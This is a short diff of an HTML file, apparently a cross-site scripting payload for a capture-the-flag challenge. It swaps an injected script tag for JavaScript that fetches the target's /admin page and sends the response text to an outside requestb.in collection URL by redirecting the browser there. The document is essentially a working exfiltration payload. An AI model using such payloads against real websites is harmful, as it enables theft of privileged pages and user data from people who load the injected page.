--- a/xss.html
+++ b/xss.html
@@ -2,7 +2,42 @@
 <head>
 </head>
   <body>
-    "><script src="http://requestb.in/15rrpyd1"></script>
-    
+    <script>
+    function createCORSRequest(method, url) {
+      var xhr = new XMLHttpRequest();
+      if ("withCredentials" in xhr) {
+      // XHR for Chrome/Firefox/Opera/Safari.
+        xhr.open(method, url, true);
+      } else if (typeof XDomainRequest != "undefined") {
+      // XDomainRequest for IE.
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+      } else {
+    // CORS not supported.
+      xhr = null;
+    }
+    return xhr;
+  }
+// Helper method to parse the title tag from the response.
+// Make the actual CORS request.
+function makeCorsRequest() {
+  // This is a sample server that supports CORS.
+  var url = 'http://de2e4dff304af27080e140d7b9cf857a054f7288.ctf.site:20000/admin';
+  var xhr = createCORSRequest('GET', url);
+  if (!xhr) {
+    alert('CORS not supported');
+    return;
+  }
+  // Response handlers.
+  xhr.onload = function() {
+    var text = xhr.responseText;
+    document.location = 'http://requestb.in/15rrpyd1?code='+ text;
+  };
+  xhr.onerror = function() {
+    alert('Woops, there was an error making the request.');
+  };
+  xhr.send();
+}
+    </script>    
   </body>
 </html>
